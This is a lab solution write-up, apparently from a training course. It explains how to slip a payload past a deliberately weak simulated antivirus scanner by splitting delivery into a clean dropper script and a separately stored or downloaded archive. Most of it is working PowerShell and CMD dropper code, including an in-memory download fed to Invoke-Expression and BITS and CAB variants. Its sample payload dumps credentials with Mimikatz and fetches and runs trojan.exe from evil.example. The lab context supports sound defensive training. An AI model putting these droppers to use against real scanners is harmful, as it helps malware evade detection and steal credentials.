Solution: Archive Container
Overview
The scanner has no archive-unpacking capability — it reads every file as a flat byte stream. The bypass works at the delivery level: you present the scanner with a clean, text-only dropper script that retrieves or extracts a separately stored archive at runtime. The payload is never given to the scanner as a file to scan.
Why Scanning the ZIP Directly Does Not Work
A ZIP file is mostly binary: compressed DEFLATE streams and structural headers contain many bytes outside the printable ASCII range (0x20–0x7E). For any real archive ≥ 64 bytes the non-printable ratio almost certainly exceeds 40%, so the scanner blocks it via Check 3 before even reaching the signature check. Wrapping a payload in a ZIP and handing it to the scanner is not a ratio bypass.
The Working Approach: Clean Dropper + Separate Archive
Step 1 — Create and store the malicious archive
# This content would be detected if scanned directly
$malicious = @"
Invoke-Mimikatz -DumpCreds
`$wc = New-Object System.Net.WebClient
`$wc.DownloadFile("http://evil.example/trojan.exe", "C:\payload.exe")
Start-Process "C:\payload.exe"
"@
Set-Content -Path ".\payload.ps1" -Value $malicious
Compress-Archive -Path ".\payload.ps1" -DestinationPath ".\data.zip" -Force
Remove-Item ".\payload.ps1"
# data.zip contains the payload but the scanner never scans this file directly.
# In a real attack scenario it would live on a network share, CDN, or be
# embedded as a resource — anywhere outside the scanner's scan path.
Step 2 — Write the clean dropper script
# dropper.ps1 — this is the ONLY file handed to the scanner.
# It is plain text, has no signature strings, and low non-printable ratio.
$archive = ".\data.zip"
$dest = ".\extracted"
Expand-Archive -Path $archive -DestinationPath $dest -Force
& "$dest\payload.ps1"
Step 3 — Verify the dropper passes all checks
nim_antimalware_sim.exe dropper.ps1
# → BENIGN
The dropper contains no signature strings, has 100% printable bytes, is well
over 32 bytes, and uses only patterns from the warning-only list
(Expand-Archive is not in suspiciousPatterns).
Variations
Download from URL at runtime (no local archive)
# dropper_web.ps1 — scanner sees only this clean script
$bytes = (New-Object System.Net.WebClient).DownloadData("http://cdn.example/data.zip")
$ms = New-Object System.IO.MemoryStream(,$bytes)
$zip = New-Object System.IO.Compression.ZipArchive($ms)
$entry = $zip.GetEntry("payload.ps1")
$sr = New-Object System.IO.StreamReader($entry.Open())
Invoke-Expression $sr.ReadToEnd()
Note: webclient and invoke-expression are in suspiciousPatterns and will
generate a warning log line — but because suspiciousPatternCheck is called with
discard in the pipeline, the file still passes (see Challenge #14).
BITS Transfer
Start-BitsTransfer -Source "http://cdn.example/data.zip" `
-Destination "$env:TEMP\data.zip"
Expand-Archive -Path "$env:TEMP\data.zip" -DestinationPath "$env:TEMP\x" -Force
& "$env:TEMP\x\payload.ps1"
CAB (Windows built-in, no extra tools)
:: Create
makecab payload.ps1 delivery.cab
:: Extract in dropper
expand delivery.cab "%TEMP%\payload.ps1"
powershell -File "%TEMP%\payload.ps1"
Why It Works
What the scanner does
1. Open file "dropper.ps1"
2. Read all bytes into memory as a flat array
3. Run signature check → no hits (no banned strings in dropper)
4. Run extension heuristic → .ps1 is suspicious → WARNING only (discarded)
5. Run non-printable ratio check → ratio ~0% (plain text) → CLEAN
6. Run small-executable check → dropper > 32 bytes → CLEAN
7. Run suspicious-pattern check → result discarded → CLEAN
8. Run entropy check → low entropy (plain text) → WARNING only (discarded)
9. Return BENIGN
What the scanner never does
✗ Follow file system references inside the dropper script
✗ Recognise ZIP / CAB / 7z magic bytes
✗ Parse archive structures
✗ Decompress or extract contained files
✗ Recursively scan extracted content
✗ Intercept runtime network downloads
The payload is retrieved and executed entirely at runtime in memory or in a path the scanner is never pointed at.
How to Verify
- Create the malicious payload and compress it:
"Invoke-Mimikatz malware trojan" | Set-Content payload.ps1 Compress-Archive payload.ps1 data.zip -Force Remove-Item payload.ps1 - Confirm the archive itself is blocked by the scanner:
nim_antimalware_sim.exe data.zip # → MALICIOUS (non-printable ratio > 40%) - Create the clean dropper:
@' Expand-Archive -Path ".\data.zip" -DestinationPath ".\x" -Force & ".\x\payload.ps1" '@ | Set-Content dropper.ps1 - Scan the dropper:
nim_antimalware_sim.exe dropper.ps1 # → BENIGN (clean text, no signatures) - Verify the payload is intact inside the archive:
Expand-Archive data.zip .\check -Force Get-Content .\check\payload.ps1 # Invoke-Mimikatz malware trojan ← original content
Key Takeaway
The archive container technique is a delivery-layer bypass: the scanner’s inability to unpack containers means any payload wrapped in an archive and delivered via a separate channel is invisible to it. Effective container scanning requires the engine to recognise archive formats, unpack them recursively, and scan every extracted file — none of which MostShittyAV implements.
AMSI Raccoon Lab